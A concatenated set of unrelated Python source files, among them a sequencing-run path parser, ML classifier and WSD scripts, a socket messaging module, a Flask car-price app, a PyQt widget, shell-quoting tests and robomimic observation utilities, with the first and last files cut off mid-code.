"Ying_Zhang", "Nickerson": "Mike_Nickerson", "Lipkowitz": "Stan_Lipkowitz", "Brownell": "Issac_Brownell", "Jung-Min": "Jung-Min_Lee", "PhilippOberdoerffer": "Philipp_Oberdoerffer", "Ambs": "Stefan_Ambs", "Shern": "Jack_Shern", "Tofilon": "Philip_Tofilon", "Doroshow": "James_Doroshow", "Alewine": "Christine_Alewine", "JonathanKeller": "Jonathan_Keller", "HowardYoung": "Howard_Young", "Klinman": "Dennis_Klinman", "Dean": "Micheal_Dean", "Pinto": "Ligia_Pinto", "Fountaine": "Thomas_Fountaine", "Rudloff": "Udo_Rudloff", "Sowalsky": "Adam_Sowalsky", "Hongliang": "Hongliang_Zhang", "Franchini": "Genoveffa_Franchini", "Myong-Hee": "Myong-Hee_Sung", "YinlingHu": "Yinling_Hu", "Agdashian": "David_Agdashian", "AlfredSinger": "Alfred_Singer", "Szabova": "Ludmila_Szabova", "XiWang":"Xi_Wang", "Gottesman": "Michael_Gottesman", "Yuspa": "Stuart_Yuspa", "Roberts": "David_Roberts", "Mistelli": "Tom_Misteli", "Misteli": "Tom_Misteli", "Tomozumi": "Tomozumi_Imamichi", "Raffit": "Raffit_Hassan", "Bartolome": "Ramiro_Iglesias-Bartolome", "RobertWest": "Robert_West", "Citrin": "Deborah_Citrin", "XinWang": "Xin_Wang", "Chunzhang": "Chunzhang_Yang"} pi_name = 'CCRSF' if log is True: logging.info("Getting pi_name from path: " + path) if 'Undetermined' in path or path.endswith('supplement.tar') or 'singlecell' in path: pi_name = 'SF_Archive_Flowcell_Info' elif 'NEBnext_UltraII' not in path and 'Neoprep' not in path \ and 'testing' not in path and 'SEER' not in path: for element in (pi_names): if element in path: #Perform mapping using pi_names if match is found pi_name = pi_names[element] break if 'CCRSF' in pi_name: # derive pi name path_elements = 
(path.split("/")[0]).split("_") # Assumes that PI name is in the beginning, and last and first names are separated by an '_' if len(path_elements) > 4 and path_elements[3].isalpha() and path_elements[4].isdigit(): # If the 4th is alpha, and 5th is a number, then pick the first 2 pi_name = path_elements[0] + "_" + path_elements[1] elif len(path_elements) > 2 and path_elements[1].isalpha() and path_elements[2].isdigit(): # If the 2nd is alpha, and 3rd is a number, then pick the first 2 pi_name = path_elements[0] + "_" + path_elements[1] #if len(path_elements) > 2 and path_elements[2].isalpha() and path_elements[2] not in ['RAS', 'cegx', 'swift']: # else if the first 3 are alpha pick 0 and 2 #pi_name = path_elements[0] + "_" + path_elements[2] #else: #if len(path_elements) > 1 and path_elements[1].isalpha(): # else if the first 2 are alpha, pick 0 and 1 #pi_name = path_elements[0] + "_" + path_elements[1] #else: #pi_name = path_elements[0] #Assumes that PI name is in the beginning, and the format is FirstnameLastname #pi_name = re.sub(r'([A-Z])', r' \1', path_elements[0]) if log is True: logging.info("pi_name from " + path + " is " + pi_name) return pi_name @staticmethod def get_contact_name(path): # derive pi name #path_elements = path.split("_") path_elements = (path.split("/")[0]).split("_") # Assumes the contact name follows the PI name separated from it by a '_', # the contact last and first names are separated by an '_' if len(path_elements) > 4 and path_elements[3].isalpha() and path_elements[4].isdigit() and len(str(path_elements[4] is 5)): contact_name = path_elements[2] + "_" + path_elements[3] else: contact_name = None # the contact name format is FirstnameLastname #if path_elements[1].isalpha(): #contact_name = re.sub(r'([A-Z])', r'_\1', path_elements[1]) #else: #contact_name = "" return contact_name @staticmethod def get_project_id(path, log = True): if log is True: logging.info("Getting project_id from path: " + path) project_id = 'Unspecified' if 'Undetermined' not in path: #path_elements = path.split("_") path_elements = (path.split("/")[0]).split("_") #The project_id is the first string containing only digits. 
If this string #is not a 5 digit number then use default project_id for element in path_elements: if element.isdigit(): if len(str(element)) >= 5: project_id = element break #If there is a string of the format 'CSXXXXXX' immediately after the #name fields where 'XXXXXX' has only digits, that is the project_id if element.startswith('CS') and element[4:].isdigit(): project_id = element break #Assumes that PI and contact names are in the format 'FirstnameLastname' #project_id = path_elements[2] if log is True: logging.info("project_id from " + path + " is " + project_id) return project_id @staticmethod def get_project_name(path, tarfile, ext = None): if 'Undetermined' in path or tarfile.endswith('supplement.tar') or 'singlecell' in tarfile or len(path.split("/")) == 1: project_name = SFHelper.get_run_name(tarfile) #if 'Undetermined' in path and ext is not None: #project_name = project_name + '_' + ext else: # derive project name if len(path.split("/")) > 2: project_name = path.split("/")[-3] else: project_name = path.split("/")[0] #Hardcoded exclusion if(project_name == 'Sample_SPECS_2070'): project_name = 'Staudt_Roland_49mRNA_11_2_15' if ext is not None and ext != 'Unaligned': project_name = project_name + '_' + ext logging.info("project_name from " + path + " and ext " + ext + " is " + project_name) else: logging.info("project_name from " + path + " is " + project_name) return project_name @staticmethod def get_sample_name(path): logging.info("Getting sample_name from path: " + path) if 'Sample_' not in path: #sample_name = 'Undetermined' #Use part of the file name i.e. upto '_S' for the sample_path file_name = path.rsplit("/", 1)[-1] sample_name = file_name.rsplit("_S", 1)[0] else: # derive sample name - first remove the filename part sample_path = path.rsplit("/", 1)[0] #Then get the sample name part sample_name = sample_path.split("Sample_")[-1] logging.info("sample_name from " + path + " is " + sample_name) return sample_name @staticmethod def get_flowcell_id(tarfile, log = True): if log is True: logging.info("Getting flowcell_id from tarfile: " + tarfile) #Rule: After the last underscore in tar filename #flowcell_str = tarfile.split(".")[0].split("_")[-1] flowcell_str = tarfile.split(".")[0].split("_")[3] flowcell_id = flowcell_str[1:len(flowcell_str)] if log is True: logging.info("Flowcell_id from tarfile: " + tarfile + " is " + flowcell_id) return flowcell_id @staticmethod def get_run_date(tarfile): #Rule: String before the first underscore in tar filename - in the form YYMMDD #Change to MM/DD/YY run_date_str = tarfile.split(".")[0].split("_")[0] run_date = datetime.strptime(run_date_str, "%y%m%d").strftime("%m-%d-%y") return run_date @staticmethod def get_run_name(tarfile): #Rule: String before the '.tar' in the tar filename run_name = tarfile.split(".")[0] # Remove '_supplement' from the project_name if present run_name = run_name.split("_supplement")[0] # Remove '_lane' from the project_name if present run_name = run_name.split("_lane")[0] return run_name @staticmethod def get_sequencing_platform(tarfile): sequencing_platform = 'Unspecified' #Rule: First letter after the first '_' (i.e. 
2nd column) in the tar filename sequencing_platform_code = tarfile.rstrip().split('_')[1][0] if(sequencing_platform_code == 'N'): sequencing_platform = 'NextSeq' elif (sequencing_platform_code == 'J' or sequencing_platform_code == 'D'): sequencing_platform = 'HiSeq' else: flowcell_id = SFHelper.get_flowcell_id(tarfile) if re.match("(\d){8}-(\w){5}", flowcell_id): sequencing_platform = 'MiSeq' return sequencing_platform @staticmethod def get_sequencing_application_type(path): sequencing_application_type = 'Unspecified' if('RNA_' in path): sequencing_application_type = 'RNA' elif('Chip_' in path): sequencing_application_type = 'Chip' elif('exomelib' in path): sequencing_application_type = 'exomelib' return sequencing_application_type
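

if __name__ == '__main__':
    # Hedged usage sketch (not part of the original helper): the tar file and
    # run-folder names below are made up purely to illustrate the parsing rules
    # encoded in SFHelper above.
    tar = '180115_J00170_0112_AHABCDBBXX.tar'
    path = 'Smith_John_Doe_Jane_123456_Hiseq/Project_Foo/Sample_ABC1/ABC1_S1_R1_001.fastq.gz'

    print(SFHelper.get_run_date(tar))               # 01-15-18
    print(SFHelper.get_flowcell_id(tar))            # HABCDBBXX
    print(SFHelper.get_sequencing_platform(tar))    # HiSeq
    print(SFHelper.get_pi_name(path))               # Smith_John
    print(SFHelper.get_contact_name(path))          # Doe_Jane
    print(SFHelper.get_project_id(path))            # 123456
    print(SFHelper.get_sample_name(path))           # ABC1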
nilq/baby-python
python
import os
from os.path import basename

from pandas import read_csv

from NaiveBayes import *
from DecisionTrees import *
from KNN import *
from K_Means import *
from Evaluator import *
from PickleFiles import *


def run():
    try:
        os.mkdir(os.path.join("", "myFiles"))
    except FileExistsError:
        pass

    ask_to_load = input("Restore a recently created model?\n1) Yes\n2) No\nYour choice: ")
    if ask_to_load == '1':
        pickle_file = input("Enter dump file destination: ")
        file_dump = loadData(pickle_file)
        analysis(file_dump)

    if ask_to_load == '2':
        discretization_mode = {'1': 'equal-width', '2': 'equal-frequency', '3': 'entropy'}
        train_path = input("Please enter training file location: ")
        test_path = input("Please enter testing file location: ")
        user_bins = int(input("\nEnter amount of bins: "))
        bin_mode = input("\nEnter discretization mode:\n1) Equal-Width\n2) Equal-Frequency\n3) Entropy\nYour choice: ")
        user_algorithm = input("\nEnter algorithm mode:\n"
                               "1) Decision Tree\n"
                               "2) SKLearn Decision Tree\n"
                               "3) Naive Bayes\n"
                               "4) SKLearn Naive Bayes\n"
                               "5) KNN\n"
                               "6) K-Means\n"
                               "Your choice: ")
        bin_mode = discretization_mode[bin_mode]
        train = read_csv(filepath_or_buffer=train_path, delimiter=',')
        test = read_csv(filepath_or_buffer=test_path, delimiter=',')

        if user_algorithm == '1':
            decision_tree = DecisionTree(train, test, basename(train_path), basename(test_path), 0.001, user_bins, bin_mode)
            decision_tree.run()
            storeData(decision_tree)
            analysis(decision_tree)

        if user_algorithm == '2':
            decision_tree_sk = DecisionTreeSKLearn(train, test, 10, 10, basename(train_path), basename(test_path))
            decision_tree_sk.run()
            storeData(decision_tree_sk)
            analysis(decision_tree_sk)

        if user_algorithm == '3':
            naive_bayes = NaiveBayes(train, test, basename(train_path), basename(test_path), user_bins, bin_mode)
            naive_bayes.run()
            storeData(naive_bayes)
            analysis(naive_bayes)

        if user_algorithm == '4':
            naive_bayes_sk = NaiveBayes_SKLearn(train, test, basename(train_path), basename(test_path))
            naive_bayes_sk.run()
            storeData(naive_bayes_sk)
            analysis(naive_bayes_sk)

        if user_algorithm == '5':
            knn = KNN(train, test, int(input("How many K clusters??\nYour choice: ")), basename(train_path), basename(test_path))
            knn.run()
            storeData(knn)
            analysis(knn)

        if user_algorithm == '6':
            k_means = KMeans(train, int(input("How many K clusters??\nYour choice: ")), 100, 30)
            k_means.run()
            storeData(k_means)
            analysis(k_means)


repeated = True
while repeated:
    run()
    if input("\n\nRun Again?\n1) Yes\n2) No\nYour choice: ") == '2':
        repeated = False
nilq/baby-python
python
import pickle import pandas as pd import nltk import re from nltk.corpus import wordnet as ewn import numpy as np def load_dataset(path,train): train_data = np.load(path, allow_pickle=True) ########if(not train): #train_data = train_data[()] embeddings = train_data['embeddings'] labels = train_data['labels'] sense_keys = train_data['synsets'] synsets = [sc2ss(sensekey) for sensekey in sense_keys] print('loaded BERT embeddings') return embeddings, labels, synsets def sc2ss(sensekey): '''Look up a synset given the information from SemCor''' ### Assuming it is the same WN version (e.g. 3.0) # TO DO: Need a better way of extracting string synset = str(ewn.lemma_from_key(sensekey).synset())[8:-2] #print(synset) return synset count = 0 def get_neg_sampling(data_loc,loc,save_loc): print(data_loc) print(loc) embeddings, labels, synsets = load_dataset(data_loc,True) df = pd.read_csv(loc,sep='\t') def get_key(sent): return sent.split()[0] df['key'] = df['gloss'].apply(get_key) print('keys done') def sc2ss(sensekey): '''Look up a synset given the information from SemCor''' ### Assuming it is the same WN version (e.g. 3.0) # TO DO: Need a better way of extracting string synset = str(ewn.lemma_from_key(sensekey).synset())[8:-2] #print(synset) return synset def get_wordnet_pos(treebank_tag): if treebank_tag.startswith('J'): return 's' elif treebank_tag.startswith('V'): return 'v' elif treebank_tag.startswith('N'): return 'n' elif treebank_tag.startswith('R'): return 'r' else: return None def sensekey_2_syn(x): syn = sc2ss(x).split('.')[1] return syn df['syn'] = df['sense_key'].apply(sensekey_2_syn) print('got syn') def get_tag(x): sent = x['sentence'] #key = x['gloss'].split()[0] key = x['key'] #sense = x['sense_key'] global count count+=1 if(count%2000==0): print('We are at line ',count) #syn = sc2ss(sense).split('.')[1] syn = x['syn'] #sent is a single sentence tokens = nltk.word_tokenize(sent) tokens = [t for t in tokens if not re.search(r'[^\w\d\s]',t)] tags = nltk.pos_tag(tokens) for i in range(len(tokens)): if tokens[i]==key: val = get_wordnet_pos(tags[i][1]) if val==syn: return 1 else: return 0 return 0 print('done') df['pos'] = df.apply(get_tag,axis=1) out = df['pos'].to_numpy() #print(df['pos'].head()) #print(df['pos'].sum()) #np.save('mask_train_pos.npy',out) embeddings = embeddings[out==1] labels = labels[out==1] synsets = np.array(synsets)[out==1] dataset = {} dataset['embeddings'] = embeddings dataset['labels'] = labels dataset['synsets'] = synsets with open(save_loc, 'wb') as handle: pickle.dump(out, handle, protocol=pickle.HIGHEST_PROTOCOL) return dataset import argparse if __name__ =='__main__': parser = argparse.ArgumentParser() parser.add_argument("--embeddings_loc",default=None,type=str,help="Location to embeddings of numpy") parser.add_argument("--csv_loc",default=None,type=str,help="Location to the csv") parser.add_argument("--save_location",default=None,type=str,help="Location for the final dataset") args = parser.parse_args() d = get_neg_sampling(data_loc=args.embeddings_loc,loc=args.csv_loc,save_loc = args.save_location) # d = get_neg_sampling(data_loc='combined.npy',loc= '/home/pratyushgarg11/data/bert-n-graph-embeddings/GlossBert-GraphEmbeddings/Training_Corpora/SemCor/semcor_train_sent_cls_ws.csv') ''' count= 0 def count_zeros(word): global count if not word: count+=1 return 0 _ = words.apply(count_zeros) print(count) print(words.head()) '''
nilq/baby-python
python
import io import json import time import errno import socket import struct import threading from . import logs from . import utils TIMEOUT = 0.1 BACKLOG = socket.SOMAXCONN CHUNK_SIZE = io.DEFAULT_BUFFER_SIZE error = socket.error timeout = socket.timeout log = logs.get(__name__) def start_client(address, handler, stop=None, retry_limit=-1, retry_interval=1): stop = stop or threading.Event() t = utils.start_thread(client_loop, address, handler, stop, retry_limit, retry_interval) return (StoppableThread(t, stop), address) def client_loop(address, handler, stop, retry_limit, retry_interval): count = 0 timeout = TIMEOUT while not stop.is_set(): try: with connect(address, timeout) as sock: sock.sendinit() handler(sock) except socket.error as e: log.error('connection error: %s', e) if stop.is_set(): break count += 1 if retry_limit != -1 and count > retry_limit: log.warning('retry limit reached (attempt #%s)', count) break time.sleep(retry_interval) log.warning('retrying connection (attempt #%s)', count) def start_server(address, handler, stop=None, backlog=None): stop = stop or threading.Event() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind(address) sock.listen(backlog or BACKLOG) host, port = sock.getsockname() log.info('listening: %s:%s', host, port) t = utils.start_thread(server_loop, sock, handler, stop) return (StoppableThread(t, stop), (host, port)) def server_loop(server_sock, handler, stop): timeout = TIMEOUT server_sock.settimeout(timeout) while not stop.is_set(): try: s, addr = server_sock.accept() except socket.timeout: continue log.info('connected: %s:%s', *addr) with SockIO(s) as sock: sock.recvinit() sock.settimeout(timeout) handler(sock) def connect(address, timeout=None): log.debug('connecting: %s:%s', *address) sock = socket.create_connection(address, timeout) log.info('connected: %s:%s', *address) return SockIO(sock) class SockIO(object): def __init__(self, sock, chunk_size=None): self._sock = sock self._chunk_size = chunk_size or CHUNK_SIZE def sendinit(self): log.debug('sendinit') self.sendmsg({'cmd': 'init'}) def recvinit(self): msg = self.recvmsg() log.debug('recvinit: %s', msg) try: if msg['cmd'] == 'init': return except Exception: pass raise InvalidInitialization() def sendmsg(self, msg): data = json.dumps(msg).encode('utf8') self.send(data) def recvmsg(self): data = self.recv() return json.loads(data.decode('utf8')) def send(self, data): data_len = len(data) size = struct.pack('>I', data_len) self._sock.sendall(size) self._sock.sendall(data) def recv(self): return b''.join(self.recviter()) def recviter(self): buf = b''.join(self.recvsize(4)) data_len = struct.unpack('>I', buf)[0] for chunk in self.recvsize(data_len): yield chunk def recvsize(self, size): sock = self._sock pos = 0 chunk_size = min(size, self._chunk_size) while pos < size: chunk = sock.recv(min(size-pos, chunk_size)) if not chunk: raise ReceiveInterrupted() pos += len(chunk) yield chunk def settimeout(self, t): self._sock.settimeout(t) def close(self): try: self._sock.shutdown(socket.SHUT_RDWR) except (OSError, socket.error) as e: # ignore if not connected if e.errno not in (errno.ENOTCONN,): raise self._sock.close() def __enter__(self): return self def __exit__(self, etype, evalue, etb): self.close() class StoppableThread(object): def __init__(self, thread, stop): self._thread = thread self._stop = stop def stop(self): self._stop.set() def join(self): self._thread.join() class SockIOError(Exception): pass class 
InvalidInitialization(SockIOError): pass class ReceiveInterrupted(SockIOError, error): pass
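

if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module): demonstrate the
    # length-prefixed JSON framing implemented by SockIO over a local socket
    # pair, without starting the client/server threads above. Because of the
    # relative imports, run this as a module (python -m <package>.<module>).
    a, b = socket.socketpair()
    with SockIO(a) as left, SockIO(b) as right:
        left.sendmsg({'cmd': 'ping', 'payload': [1, 2, 3]})
        print(right.recvmsg())   # {'cmd': 'ping', 'payload': [1, 2, 3]}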
nilq/baby-python
python
from flask import Flask, request, render_template from flask_cors import cross_origin import pickle app = Flask(__name__) model = open('car.pkl','rb') regressor = pickle.load(model) @app.route("/") @cross_origin() def home(): return render_template('car.html') @app.route("/predict", methods=["GET","POST"]) @cross_origin() def predict(): #CAR BRAND AMBASSADOR=0 AUDI=0 BENTLEY=0 BMW=0 CHEVROLET=0 DATSUN=0 FIAT=0 FORCE=0 FORD=0 HONDA=0 HYUNDAI=0 ISUZU=0 JAGUAR=0 JEEP=0 LAMBORGHINI=0 LAND=0 MAHINDRA=0 MARUTI=0 MERCEDES=0 MINI=0 MITSUBISHI=0 NISSAN=0 PORSCHE=0 RENAULT=0 SKODA=0 TATA=0 TOYOTA=0 VOLKSWAGEN=0 VOLVO=0 #LOCATION Ahmedabad=0 Bangalore=0 Chennai=0 Pune=0 Mumbai=0 Coimbatore=0 Hyderabad=0 Jaipur=0 Kochi=0 Kolkata=0 Delhi=0 #FUEL Diesel=0 LPG=0 Petrol=0 CNG=0 #TRANSMISSION Manual=0 if request.method == 'POST': name = request.form['Brand'] if name == 'AUDI': AUDI=1 elif name == 'BENTLEY': BENTLEY=1 elif name == 'BMW': BMW=1 elif name == 'CHEVROLET': CHEVROLET=1 elif name == 'DATSUN': DATSUN=1 elif name == 'FIAT': FIAT=1 elif name == 'FORCE': FORCE=1 elif name == 'FORD': FORD=1 elif name == 'HONDA': HONDA=1 elif name == 'HYUNDAI': HYUNDAI=1 elif name == 'ISUZU': ISUZU=1 elif name == 'JAGUAR': JAGUAR=1 elif name == 'JEEP': JEEP=1 elif name == 'LAMBORGHINI': LAMBORGHINI=1 elif name == 'LAND': LAND=1 elif name == 'MAHINDRA': MAHINDRA=1 elif name == 'MARUTI': MARUTI=1 elif name == 'MERCEDES-BENZ': MERCEDES=1 elif name == 'MINI': MINI=1 elif name == 'MITSUBUSHI': MITSUBISHI=1 elif name == 'NISSAN': NISSAN=1 elif name == 'PORSCHE': PORSCHE=1 elif name == 'RENAULT': RENAULT=1 elif name == 'SKODA': SKODA=1 elif name == 'TATA': TATA=1 elif name == 'TOYOTA': TOYOTA=1 elif name == 'VOLKSWAGEN': VOLKSWAGEN=1 elif name == 'VOLVO': VOLVO=1 else: AMBASSADOR=1 loc = request.form['Location'] if loc=='Bangalore': Bangalore=1 elif loc=='Chennai': Chennai=1 elif loc=='Pune': Pune=1 elif loc=='Mumbai': Mumbai=1 elif loc=='Coimbatore': Coimbatore=1 elif loc=='Hyderabad': Hyderabad=1 elif loc=='Jaipur': Jaipur=1 elif loc=='Kochi': Kochi=1 elif loc=='Kolkata': Kolkata=1 elif loc=='Delhi': Delhi=1 else: Ahmedabad=1 fuel = request.form['Fuel'] if fuel=='Diesel': Diesel=1 elif fuel=='Petrol': Petrol=1 elif fuel=='LPG': LPG=1 else: CNG=1 trans = request.form['Transmission'] if trans == 'Manual': Manual=1 Year = request.form['Year'] Kms = request.form['Kms'] Own = request.form['Owner'] Mileage = request.form['Mileage'] Engine = request.form['Engine'] Power = request.form['Power'] Seat = request.form['Seats'] #PREDICTION Price = regressor.predict([[ Year,Kms,Own,Mileage,Engine,Power,Seat,AUDI,BENTLEY,BMW,CHEVROLET,DATSUN,FIAT,FORCE,FORD,HONDA, HYUNDAI,ISUZU,JAGUAR,JEEP,LAMBORGHINI,LAND,MAHINDRA,MARUTI,MERCEDES,MINI,MITSUBISHI,NISSAN, PORSCHE,RENAULT,SKODA,TATA,TOYOTA,VOLKSWAGEN,VOLVO,Bangalore,Chennai,Coimbatore,Delhi,Hyderabad, Jaipur,Kochi,Kolkata,Mumbai,Pune,Diesel,LPG,Petrol,Manual ]]) output=round(Price[0],2) return render_template('car.html',prediction_text="Your car's price should be Rs. {} lakhs. This price may change depending on the condition of the car.".format(output)) return render_template("car.html") if __name__ == "__main__": app.run(debug=True)
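

# Hedged usage sketch (not part of the original app): with `car.pkl` present and
# the server running (`python app.py`, Flask's default port 5000), the /predict
# form could be exercised from Python roughly like this. The field names mirror
# the request.form lookups above; the values are made up.
#
#     import requests
#     form = {
#         'Brand': 'HONDA', 'Location': 'Mumbai', 'Fuel': 'Petrol',
#         'Transmission': 'Manual', 'Year': 2015, 'Kms': 41000, 'Owner': 1,
#         'Mileage': 19.7, 'Engine': 1497, 'Power': 117.3, 'Seats': 5,
#     }
#     print(requests.post('http://127.0.0.1:5000/predict', data=form).status_code)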
nilq/baby-python
python
"""Qgroupbox module.""" # -*- coding: utf-8 -*- from PyQt6 import QtWidgets, QtCore # type: ignore[import] from pineboolib.core import decorators from pineboolib.core import settings from pineboolib import logging from . import qwidget from typing import Any logger = logging.get_logger(__name__) class QGroupBox(QtWidgets.QGroupBox, qwidget.QWidget): # type: ignore [misc] # noqa: F821 """QGroupBox class.""" # style_str: str # _line_width: int presset = QtCore.pyqtSignal(int) selectedId: int line_width: int = 1 def __init__(self, *args, **kwargs) -> None: """Inicialize.""" if len(args): name = None parent = None if isinstance(args[0], str): name = args[0] else: parent = args[0] if len(args) > 1: if isinstance(args[1], str): name = args[1] else: parent = args[1] if parent is not None: super().__init__(parent, **kwargs) else: super().__init__(**kwargs) if name is not None: self.setObjectName(name) else: super().__init__() if not settings.CONFIG.value("ebcomportamiento/spacerLegacy", False): self.setSizePolicy( QtWidgets.QSizePolicy.Policy.Expanding, QtWidgets.QSizePolicy.Policy.Preferred ) self.setContentsMargins(0, 2, 0, 2) def setLayout(self, layout: QtWidgets.QLayout) -> None: """Set layout to QGroupBox.""" # layout.setContentsMargins(0, 0, 0, 0) # layout.setSpacing(0) super().setLayout(layout) def setLineWidth(self, width: int) -> None: """Set line width.""" style_ = ( "QGroupBox#%s { border: %spx solid gray; margin-top: 20px; border-radius: 3px;}" % (self.objectName(), width) ) self.line_width = width self.setStyleSheet(style_) def setTitle(self, title: str) -> None: """Set title.""" if self.line_width == 0: title = "" if title == "": self.setLineWidth(0) super().setTitle(title) def get_enabled(self) -> bool: """Return if enabled.""" return self.isEnabled() def set_enabled(self, value: bool) -> None: """Set enabled.""" self.setDisabled(not value) @decorators.pyqt_slot(bool) def setShown(self, value: bool) -> None: """Set shown.""" self.setVisible(value) def __setattr__(self, name: str, value: Any) -> None: """Set an attribute especified by name.""" if name == "title": self.setTitle(str(value)) else: super().__setattr__(name, value) @decorators.not_implemented_warn def setFrameShadow(self, frame_shadow: None) -> None: """Set frame shadow.""" pass @decorators.not_implemented_warn def setFrameShape(self, frame_shape: None) -> None: """Set frame shape.""" pass @decorators.not_implemented_warn def newColumn(self) -> None: """Create a new column.""" pass enabled = property(get_enabled, set_enabled)
nilq/baby-python
python
from datetime import timedelta

from django.test import TestCase
from django.utils.timezone import now

from core.models.route import Route
from core.models.station import Station
from core.models.tender import Tender
from core.models.workshop import Workshop

TEST_WORKSHOP = 'Bw Hagen'
TEST_ROUTE = 'KBS 100 Hamburg - Rostock'
TEST_DESCRIPTION = """Die Stadt Hamburg, die Nahverkehrsgesellschaft Schleswig-Holstein und das Verkehrsministerium Mecklenburg-Vorpommern schreiben aus."""


class TenderModelTest(TestCase):
    def setUp(self):
        Route.objects.create(name=TEST_ROUTE, type=Route.LOCAL)
        Station.objects.create(name='Hagen Hbf')
        Workshop.objects.create(name='Bw Hagen', station=Station.objects.get(name="Hagen Hbf"))

    @staticmethod
    def test_create_valid_min():
        Tender.objects.create(route=Route.objects.get(name=TEST_ROUTE))

    @staticmethod
    def test_create_valid_full():
        Tender.objects.create(route=Route.objects.get(name=TEST_ROUTE), text=TEST_DESCRIPTION,
                              start_date=now(), end_date=now() + timedelta(days=2 * 365))

    @staticmethod
    def test_add_workshop():
        tender = Tender.objects.create(route=Route.objects.get(name=TEST_ROUTE))
        tender.workshops.add(Workshop.objects.get(name=TEST_WORKSHOP))

    def test_to_string(self):
        tender = Tender.objects.create(route=Route.objects.get(name=TEST_ROUTE), text=TEST_DESCRIPTION,
                                       start_date=now(), end_date=now() + timedelta(days=2 * 365))
        self.assertEquals(tender.__str__(), TEST_ROUTE)
nilq/baby-python
python
from io import StringIO from .. import * from bfg9000 import path from bfg9000 import safe_str from bfg9000.shell.syntax import * class my_safe_str(safe_str.safe_string): pass class TestWriteString(TestCase): def test_variable(self): out = Writer(StringIO()) out.write('foo', Syntax.variable) out.write('$bar', Syntax.variable) self.assertEqual(out.stream.getvalue(), 'foo$bar') def test_shell(self): out = Writer(StringIO()) out.write('foo', Syntax.shell) out.write('$bar', Syntax.shell) self.assertEqual(out.stream.getvalue(), "foo'$bar'") class TestWriteLiteral(TestCase): def test_variable(self): out = Writer(StringIO()) out.write(safe_str.literal('$foo'), Syntax.variable) self.assertEqual(out.stream.getvalue(), '$foo') def test_shell(self): out = Writer(StringIO()) out.write(safe_str.literal('$foo'), Syntax.shell) self.assertEqual(out.stream.getvalue(), '$foo') class TestWriteJbos(TestCase): def test_variable(self): out = Writer(StringIO()) s = safe_str.jbos('$foo', safe_str.literal('bar')) out.write(s, Syntax.variable) self.assertEqual(out.stream.getvalue(), '$foobar') def test_shell(self): out = Writer(StringIO()) s = safe_str.jbos('$foo', safe_str.literal('bar')) out.write(s, Syntax.shell) self.assertEqual(out.stream.getvalue(), "'$foo'bar") class TestWritePath(PathTestCase): def test_variable(self): out = Writer(StringIO()) out.write(self.Path('foo', path.InstallRoot.bindir), Syntax.variable) self.assertEqual(out.stream.getvalue(), self.ospath.join('${bindir}', 'foo')) def test_shell(self): out = Writer(StringIO()) out.write(self.Path('foo', path.InstallRoot.bindir), Syntax.shell) self.assertEqual(out.stream.getvalue(), "'" + self.ospath.join('${bindir}', 'foo') + "'") class TestWriteInvalid(TestCase): def test_invalid(self): out = Writer(StringIO()) with self.assertRaises(TypeError): out.write(my_safe_str(), Syntax.variable) class TestWriteEach(TestCase): def test_basic(self): out = Writer(StringIO()) out.write_each(['foo', 'bar'], Syntax.variable) self.assertEqual(out.stream.getvalue(), 'foo bar') def test_delims(self): out = Writer(StringIO()) out.write_each(['foo', 'bar'], Syntax.variable, ',', '[', ']') self.assertEqual(out.stream.getvalue(), '[foo,bar]') class TestVariable(TestCase): def test_equality(self): self.assertTrue(Variable('foo') == Variable('foo')) self.assertFalse(Variable('foo') != Variable('foo')) self.assertFalse(Variable('foo') == Variable('bar')) self.assertTrue(Variable('foo') != Variable('bar')) def test_concat_str(self): self.assertEqual(Variable('foo') + 'bar', safe_str.jbos( safe_str.literal('${foo}'), 'bar' )) self.assertEqual('foo' + Variable('bar'), safe_str.jbos( 'foo', safe_str.literal('${bar}') )) def test_concat_path(self): self.assertEqual(Variable('foo') + path.Path('bar'), safe_str.jbos( safe_str.literal('${foo}'), path.Path('bar') )) self.assertEqual(path.Path('foo') + Variable('bar'), safe_str.jbos( path.Path('foo'), safe_str.literal('${bar}') )) def test_concat_var(self): self.assertEqual(Variable('foo') + Variable('bar'), safe_str.jbos( safe_str.literal('${foo}'), safe_str.literal('${bar}') )) def test_hash(self): self.assertEqual(hash(Variable('foo')), hash(Variable('foo')))
nilq/baby-python
python
""" A collection of utilities for working with observation dictionaries and different kinds of modalities such as images. """ import numpy as np from copy import deepcopy from collections import OrderedDict import torch import torch.nn.functional as F import robomimic.utils.tensor_utils as TU # DO NOT MODIFY THIS! # This keeps track of observation types - and is populated on call to @initialize_obs_utils_with_obs_specs. # This will be a dictionary that maps observation type (e.g. low_dim, image) to a list of observation # modalities under that observation type. OBS_TYPE_TO_MODALITIES = None def initialize_obs_utils_with_obs_specs(obs_modality_specs): """ This function should be called before using any modality-specific functions in this file, in order to make sure that all utility functions are aware of the observation types (e.g. which ones are low-dimensional, and which ones are images). It constructs a dictionary that map observation type (e.g. low_dim, image) to a list of observation modalities under that type. Input should be a nested dictionary (or list of such dicts) with the following structure: obs_variant (str): obs_type (str): modalities (list) ... ... Example: { "obs": { "low_dim": ["robot0_eef_pos", "robot0_eef_quat"], "image": ["agentview_image", "robot0_eye_in_hand"], } "goal": { "low_dim": ["robot0_eef_pos"], "image": ["agentview_image"] } } In the example, raw observations consist of low-dim and image types, with the robot end effector pose under low-dim, and the agentview and wrist camera images under image, while goal observations also consist of low-dim and image types, with a subset of the raw observation modalities per type. Args: obs_modality_specs (dict or list): A nested dictionary (see docstring above for an example) or a list of nested dictionaries. Accepting a list as input makes it convenient for situations where multiple modules may each have their own modality spec. """ global OBS_TYPE_TO_MODALITIES # accept one or more spec dictionaries - if it's just one, account for this if isinstance(obs_modality_specs, dict): obs_modality_spec_list = [obs_modality_specs] else: obs_modality_spec_list = obs_modality_specs # iterates over observation specs obs_type_mapping = {} for obs_modality_spec in obs_modality_spec_list: # iterates over observation variants (e.g. observations, goals, subgoals) for obs_variant in obs_modality_spec: for obs_type in obs_modality_spec[obs_variant]: # add all modalities for each obs-type to the corresponding list in obs_type_mapping if obs_type not in obs_type_mapping: obs_type_mapping[obs_type] = [] obs_type_mapping[obs_type] += obs_modality_spec[obs_variant][obs_type] # remove duplicate entries and store in global mapping OBS_TYPE_TO_MODALITIES = { obs_type : list(set(obs_type_mapping[obs_type])) for obs_type in obs_type_mapping } print("\n============= Initialized Observation Utils with Obs Spec =============\n") for obs_type in OBS_TYPE_TO_MODALITIES: print("using obs type: {} with modalities: {}".format(obs_type, OBS_TYPE_TO_MODALITIES[obs_type])) def 